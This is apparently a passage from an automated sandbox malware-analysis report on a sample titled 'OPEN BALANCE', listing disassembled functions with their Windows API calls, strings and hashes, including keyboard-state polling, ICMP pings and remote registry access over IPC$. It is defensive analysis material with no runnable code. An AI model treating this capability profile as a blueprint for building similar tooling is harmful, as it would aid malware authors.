Instruction ID: 13dec9f0f15da7f13d9d480ef2b0b1be7a764adf4574ca0ecbcef1878e2f5f65
Opcode Fuzzy Hash: 040054bbe6f85acc754eba39ad441521591d2ac656d26d19371a5101107b6d22
Instruction Fuzzy Hash: 2011543169026D7DE720A765DC4AEFF6ABCFBE2B44F000425B411E24D1DF701915C5B1

Function 008A5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 008A5CE2
GetWindowRect.USER32(00000000,?), ref: 008A5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008A5D59
GetDlgItem.USER32(?,00000002), ref: 008A5D69
GetWindowRect.USER32(00000000,?), ref: 008A5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008A5DCF
GetDlgItem.USER32(?,000003E9), ref: 008A5DDD
GetWindowRect.USER32(00000000,?), ref: 008A5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008A5E31
GetDlgItem.USER32(?,000003EA), ref: 008A5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008A5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 008A5E67

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: d7037e6c631d688b3413d75c4a19c7811fbfd757342b5ac6312fa73bd930b2f2
Instruction ID: e58ad84007ee46f6e4994f4c233d015f1ad2d4e5f59750a6e307bb5c545dcb81
Opcode Fuzzy Hash: d7037e6c631d688b3413d75c4a19c7811fbfd757342b5ac6312fa73bd930b2f2
Instruction Fuzzy Hash: 57511071B0060AAFDF18CF68DD89AAEBBB5FB59310F148229F515E7690D7709E40CB50

Function 00859838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00859944: GetWindowLongW.USER32(?,000000EB), ref: 00859952

GetSysColor.USER32(0000000F), ref: 00859862

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e59f03ff11ad60284dead44c0d5859ad9cfad8eb7599fd4bdb296cba96895e16
Instruction ID: 61b4574b132fa716515c0b5847a8d9ece8e66a2c8e7a1d143deeb3752b3fcd86
Opcode Fuzzy Hash: e59f03ff11ad60284dead44c0d5859ad9cfad8eb7599fd4bdb296cba96895e16
Instruction Fuzzy Hash: 08418E31105655EFDF205F389C88BB93BA5FB06332F184666E9E2CB2E1D7319845DB10

Function 008A96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0088F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 008A9717
LoadStringW.USER32(00000000,?,0088F7F8,00000001), ref: 008A9720

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0088F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 008A9742
LoadStringW.USER32(00000000,?,0088F7F8,00000001), ref: 008A9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 008A9866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 008A984A
Error: , xrefs: 008A981D
Line %d (File "%s"):, xrefs: 008A978F
^ ERROR, xrefs: 008A97FB
Line %d:, xrefs: 008A97A0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 0ec61125f87dfbc881f55abecc058e7315feb1db6ab8f405413499594a19f6cc
Instruction ID: a7ac225106a8e7ac2e130624796eeb057b96302a8753bc3d5fcbf3846168e779
Opcode Fuzzy Hash: 0ec61125f87dfbc881f55abecc058e7315feb1db6ab8f405413499594a19f6cc
Instruction Fuzzy Hash: 2A41387280421DAADF14EBE8DD86DEEB778FF55340F500025F601B2092EB256F48CAA2

Function 008D541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008D5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008D5515
CharNextW.USER32(00000158), ref: 008D5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008D5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008D559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008D55AC

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: a5031f75acba8b694e9f48ce54f56cfa3e27b24b043fb3cad8f1409ffccc3ef8
Instruction ID: a22ad5cacd8214450eec3bfb2433836489bcb136d67f59c3c2ad0b8a85d1471a
Opcode Fuzzy Hash: a5031f75acba8b694e9f48ce54f56cfa3e27b24b043fb3cad8f1409ffccc3ef8
Instruction Fuzzy Hash: 11617B70905609ABDF109F94DC84EFE7BB9FB09764F10824BF925EA390D7708A80DB61

Function 0089FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0089FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0089FB08
VariantInit.OLEAUT32(?), ref: 0089FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0089FB3A
VariantCopy.OLEAUT32(?,?), ref: 0089FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0089FBA1
VariantClear.OLEAUT32(?), ref: 0089FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0089FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0089FBCC
VariantClear.OLEAUT32(?), ref: 0089FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0089FBE9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: b5f34fb864e9042cc41ba71e59063bff954aa88b99f89627c9906aa9d14e0146
Instruction ID: b4269d0bdf63f3f8763908abc0868826a6fd443991d2f9c97436c61b7a84a95b
Opcode Fuzzy Hash: b5f34fb864e9042cc41ba71e59063bff954aa88b99f89627c9906aa9d14e0146
Instruction Fuzzy Hash: 26416035A0021A9FCF04EF68CC549AEBBB9FF08354F048169E945E7262CB70A945CF91

Function 008A9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008A9CA1
GetAsyncKeyState.USER32(000000A0), ref: 008A9D22
GetKeyState.USER32(000000A0), ref: 008A9D3D
GetAsyncKeyState.USER32(000000A1), ref: 008A9D57
GetKeyState.USER32(000000A1), ref: 008A9D6C
GetAsyncKeyState.USER32(00000011), ref: 008A9D84
GetKeyState.USER32(00000011), ref: 008A9D96
GetAsyncKeyState.USER32(00000012), ref: 008A9DAE
GetKeyState.USER32(00000012), ref: 008A9DC0
GetAsyncKeyState.USER32(0000005B), ref: 008A9DD8
GetKeyState.USER32(0000005B), ref: 008A9DEA

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e25a1447b115dd2bc5178ab9015a0663f3e0f6b45cd6f8e99669661d0afaa53e
Instruction ID: a6c7e8b577e5d9509161e46f0b6011774448a82253bf67597daddf4676846537
Opcode Fuzzy Hash: e25a1447b115dd2bc5178ab9015a0663f3e0f6b45cd6f8e99669661d0afaa53e
Instruction Fuzzy Hash: 6E41D63450CBCA6DFF30866488443B5BFA0FF13354F04815ADAC6969C2EBE499C8C7A2

Function 008C055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 008C05BC
inet_addr.WS2_32(?), ref: 008C061C
gethostbyname.WS2_32(?), ref: 008C0628
IcmpCreateFile.IPHLPAPI ref: 008C0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008C06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008C06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 008C07B9
WSACleanup.WS2_32 ref: 008C07BF

Strings

Ping, xrefs: 008C0676

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 50ee3b887fb83472b65bd6122a233d808f39aaa66cb9f0a38dd98bd3adc48558
Instruction ID: 298b12881c8d89968a37bf2b102c994aef281b50dfbd1def57a26ecca499969e
Opcode Fuzzy Hash: 50ee3b887fb83472b65bd6122a233d808f39aaa66cb9f0a38dd98bd3adc48558
Instruction Fuzzy Hash: 34914435608201DFD724CF19C889F1ABBE0FB44358F1486A9E469DB6A2C731ED45CF82

Function 008C8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 008C8CF3

Part of subcall function 008A8E54: _wcslen.LIBCMT ref: 008A8E77

_wcslen.LIBCMT ref: 008C8D4E
_wcslen.LIBCMT ref: 008C8D9C
_wcslen.LIBCMT ref: 008C8DDC
_wcslen.LIBCMT ref: 008C8E6E

Strings

winapi, xrefs: 008C8D96, 008C8D9B
cdecl, xrefs: 008C8D48, 008C8D4D
stdcall, xrefs: 008C8DD6, 008C8DDB
none, xrefs: 008C8E65, 008C8E6A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 8147cd0f539ac32770abe1809286e4d68caac957e0e15923c0d1b012d84717d6
Instruction ID: 59b640f7b6a3ff85d06e528e8ce453ae3d0b8982b8b5f63d7c2aa338f6c8d3b2
Opcode Fuzzy Hash: 8147cd0f539ac32770abe1809286e4d68caac957e0e15923c0d1b012d84717d6
Instruction Fuzzy Hash: 75518D32A4011ADACB24DF6CC940ABEB7B5FF64324B21422DE526E72C5DB31DD40C791

Function 008ADC0E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008ADC50
_wcsstr.LIBVCRUNTIME ref: 008ADCA0
74D31560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008ADCBC

Strings

\VarFileInfo\Translation, xrefs: 008ADCB4
%u.%u.%u.%u, xrefs: 008ADD9A
04090000, xrefs: 008ADCF2
DefaultLangCodepage, xrefs: 008ADD1F
StringFileInfo\, xrefs: 008ADC8F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: D31560_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 2357346915-1459072770
Opcode ID: a4f571930f60bbd79e5bb4e50cb27bb352dff37504f0af5ebdd4902f25094a6e
Instruction ID: 26dda8608b245ef4fd1d1be8b5511e662b319a4f53c9e96fc5dcbf3f56c56979
Opcode Fuzzy Hash: a4f571930f60bbd79e5bb4e50cb27bb352dff37504f0af5ebdd4902f25094a6e
Instruction Fuzzy Hash: B04126329403057BEB10A7799C07EBF776CFF42760F10016AFA01EA6C2EB749901C6A6

Function 008B3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008B33CF

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008B33F0

Strings

"%s" (%d) : ==> %s:, xrefs: 008B3522
Error: , xrefs: 008B34D1
Line %d (File "%s"):, xrefs: 008B3443, 008B345C
"%s" (%d) : ==> %s:%s%s, xrefs: 008B3504
^ ERROR , xrefs: 008B349E
Incorrect parameters to object property !, xrefs: 008B34AB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: f9597e0e070028d012e67d7965d3a762d933fa1a4b6a345cb0100c36c31088e8
Instruction ID: 847a40db25ca0b1047ee04b5cb19ce6da0753ae8c58d1f95f8da955d9d208cc8
Opcode Fuzzy Hash: f9597e0e070028d012e67d7965d3a762d933fa1a4b6a345cb0100c36c31088e8
Instruction Fuzzy Hash: E4518D32904209AADF25EBA8DD46EEEB778FF14344F104165F505B21A2EB312F58DB62

Function 008AB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008AB5FC
_wcslen.LIBCMT ref: 008AB608
_wcslen.LIBCMT ref: 008AB64D
_wcslen.LIBCMT ref: 008AB68C
_wcslen.LIBCMT ref: 008AB6C7

Strings

REMOVE, xrefs: 008AB602, 008AB607
KEYS, xrefs: 008AB647, 008AB64C
APPEND, xrefs: 008AB6C1, 008AB6C6
EXISTS, xrefs: 008AB686, 008AB68B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 77bc274eb96d014815c9f1f903a361eeaa5ca3a0855e910f0b4c7efde27f63a1
Instruction ID: c96ca53716d39b63c76aaee2e71143414cff1acaec7e7adadc789370de305192
Opcode Fuzzy Hash: 77bc274eb96d014815c9f1f903a361eeaa5ca3a0855e910f0b4c7efde27f63a1
Instruction Fuzzy Hash: BC41D832A001279BDB205F7DC8905BE7BA5FF72754B254129E461DB686F731CD81C790

Function 008A06DE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00846B57: _wcslen.LIBCMT ref: 00846B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008A07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008A07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008A07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008A0804
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008A0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008A083C

Strings

\CLSID, xrefs: 008A0724
SOFTWARE\Classes\, xrefs: 008A070E
\IPC$, xrefs: 008A0784

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Close$ConnectConnection2OpenQueryRegistryValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 3780161356-22481851
Opcode ID: 368f44906182b849238fbee074524520fde232fd828bdc46c3cff86c7d68f308
Instruction ID: 740bf2d02190599369a47a9ca6f59fcf92dee3efb7e6b17f02ecd6c01195a343
Opcode Fuzzy Hash: 368f44906182b849238fbee074524520fde232fd828bdc46c3cff86c7d68f308
Instruction Fuzzy Hash: D841D572C1122DABDF25EBA8DC958EEB778FF44350F454129E911A71A1EB309E04CFA1

Function 008B5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008B53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008B5416
GetLastError.KERNEL32 ref: 008B5420
SetErrorMode.KERNEL32(00000000,READY), ref: 008B54A7

Strings

INVALID, xrefs: 008B5459
READY, xrefs: 008B5460, 008B5468
READONLY, xrefs: 008B5452
UNKNOWN, xrefs: 008B5444
NOTREADY, xrefs: 008B544B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: c117c8705ff2b677d8843a32400e9488860cd164dce082ea1b92645dc5b82d15
Instruction ID: 2ba5560bd1cb98f6e5f57d4f47c98c471ef58a35c2d8dafd0c86297ce7e89f46
Opcode Fuzzy Hash: c117c8705ff2b677d8843a32400e9488860cd164dce082ea1b92645dc5b82d15
Instruction Fuzzy Hash: 8A316DB5A006099FDB10DF68C884BEABBB4FB45309F148069E505DB392DB71ED86CB91

Function 008D3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 008D3C79
SetMenu.USER32(?,00000000), ref: 008D3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008D3D10
IsMenu.USER32(?), ref: 008D3D24
CreatePopupMenu.USER32 ref: 008D3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008D3D5B
DrawMenuBar.USER32 ref: 008D3D63

Strings

F, xrefs: 008D3D4E
0, xrefs: 008D3C54

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
